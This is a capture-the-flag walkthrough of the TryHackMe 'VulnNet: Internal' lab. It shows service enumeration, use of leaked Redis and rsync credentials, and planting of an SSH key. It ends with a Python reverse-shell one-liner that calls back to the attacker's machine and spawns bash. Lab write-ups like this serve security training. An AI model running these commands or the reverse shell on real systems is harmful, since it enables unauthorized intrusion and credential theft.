# VulnNet: Internal

**Room Link:** <https://tryhackme.com/room/vulnnetinternal>

### Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FKjaN3qJW2HSK9CbDvQTf%2Fimage.png?alt=media&#x26;token=5120380a-78d5-41a5-919a-193f3ee44e59" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FZgG5TaT3SvacJ7uLes1N%2Fimage.png?alt=media&#x26;token=3dbca06a-733b-4102-94b1-323fbc97bbe9" alt=""><figcaption></figcaption></figure>

### Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FHXF3yoTiRvzyaAZhYUOx%2Fimage.png?alt=media&#x26;token=abc5265b-34d1-427a-92d0-8dec50159421" alt=""><figcaption></figcaption></figure>

### TCP/139 - **NetBIOS**

```
nbtscan $VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FmXN6fmxUz1FwYBWTctlB%2Fimage.png?alt=media&#x26;token=c8816ab9-315d-4454-ad2d-57a7dd0de36f" alt=""><figcaption></figcaption></figure>

###

### TCP/445 - **SMB**

In SMB there is the first flag.

**Kali**

```
smbget -R smb://$VICTIM/shares
smbclient  \\\\$VICTIM\\shares
smb: \> cd temp
smb: \temp\> get services.txt
smb: \temp\> cd ..
smb: \> cd data
smb: \data\> get data.txt 
smb: \data\> get business-req.txt 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FNs4vIqaRnqD8jozpuuQ6%2Fimage.png?alt=media&#x26;token=6f916b0f-fa35-423e-8d18-2d4a1838c661" alt=""><figcaption></figcaption></figure>

### TCP/2049 - **NFS**

**Kali**

```
showmount -e $VICTIM
mkdir /mnt/nfs
mount $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfs
cat redis/redis.conf
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPt9qn5X5B6dxHEsvQwx0%2Fimage.png?alt=media&#x26;token=909013d6-00fd-4378-b182-4d848301bec8" alt=""><figcaption></figcaption></figure>

### TCP/6379 - Redis

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F6tLfkjETYaC3y7YIikNB%2Fimage.png?alt=media&#x26;token=218402f6-01c2-4de0-96a6-28634f9031c4" alt=""><figcaption></figcaption></figure>

**Kali**

```
redis-cli -h $VICTIM -a "B65Hx562F@ggAZ@F"
10.10.232.200:6379> KEYS *
10.10.232.200:6379> KEYS "internal flag"
10.10.232.200:6379> GET "internal flag"
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FSX9NRcCbvMwK5cjheSAA%2Fimage.png?alt=media&#x26;token=73754e29-684f-4a63-b259-3cc63a97ed70" alt=""><figcaption></figcaption></figure>

**Kali**

```
KEYS "authlist"
LRANGE authlist 1 100
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FbBOX2OctzW1ulmw3QHQK%2Fimage.png?alt=media&#x26;token=8526b743-aec8-4951-bbdf-1ca00af70395" alt=""><figcaption></figcaption></figure>

**Kali**

```
echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FrBk19hezT7p4vgxgnyg5%2Fimage.png?alt=media&#x26;token=298bbed9-db0a-4a46-8c5a-1d86f6369edd" alt=""><figcaption></figcaption></figure>

### TCP/873 - RSYNC

We are able to transfer out key to allow us to login to as the sys-internal user.

**Kali**

```
rsync --list-only rsync://$VICTIM 
rsync --list-only rsync://rsync-connect@$VICTIM/files
Password: Hcg3HP67@TW@Bc72v
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh
Password: Hcg3HP67@TW@Bc72v
```

### TCP/22 - SSH

**Kali**

```
ssh sys-internal@$VICTIM
```

**Victim**

```
ss -ltp
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FHinLgTSDgZPzxsuJgW2t%2Fimage.png?alt=media&#x26;token=2f6835a8-71eb-4f53-b1fe-eac368083caf" alt=""><figcaption></figcaption></figure>

**Kali**

```
ssh -D 9050 sys-internal@$VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F4w3XBErH8aflW890YgqA%2Fimage.png?alt=media&#x26;token=0a679f8c-79ad-40a8-9d9a-1e46201579f7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FoOfps0gs7gcW71c4LYVW%2Fimage.png?alt=media&#x26;token=5635fa23-a6d6-4826-b5d0-cdb71d38210b" alt=""><figcaption></figcaption></figure>

Add the token in the Authentication token. There was multiple listed, it was the last one

**Victim**

```
grep -iR token /TeamCity/logs/ 2>/dev/null
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FdFRYz7RLOQtAtzP0bcHq%2Fimage.png?alt=media&#x26;token=e5788e27-0128-463b-b38c-f9cac002780f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPitYNq77CkCT72e8WtdU%2Fimage.png?alt=media&#x26;token=3db6817f-ba8a-4d4f-95c3-32dd2a5dcf2c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FhML6AveOqmdtUwiCYoiV%2Fimage.png?alt=media&#x26;token=45599199-5043-4df3-9bad-0cd60646471f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F6ZEAo3ntsl8J4Yn10Iej%2Fimage.png?alt=media&#x26;token=c8267e58-ddaa-43a3-82b3-a401f1e692c1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FmVoTHmwJMxpYnyfwJuXi%2Fimage.png?alt=media&#x26;token=00ba8246-4a7a-4277-aab2-93f89fdec273" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FfWzEXoxtexc0fLwfEkOQ%2Fimage.png?alt=media&#x26;token=3c8c0423-4546-4fc6-8cd6-167744693ad3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FniTi3CCWbmIgiXcx8BaX%2Fimage.png?alt=media&#x26;token=fcbe3c5b-351a-4a0a-badf-ca1bbf4a0e1a" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -lvnp 1337
```

**Custom script**

```
export RHOST="$KALI";export RPORT=1337;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPk8rj3wMRODDwuioAZZc%2Fimage.png?alt=media&#x26;token=c2dfa90f-03d8-41fe-822d-7ce5afaee162" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FQaaO3WBnTxGwmQ4uTOI0%2Fimage.png?alt=media&#x26;token=1cc75630-60b8-483c-b57c-f7c2f5b83b2c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FT6ZuHiUVahsqXdRd4r4r%2Fimage.png?alt=media&#x26;token=9da9db83-507f-4ce8-b316-7d9eb9bfd28c" alt=""><figcaption></figcaption></figure>
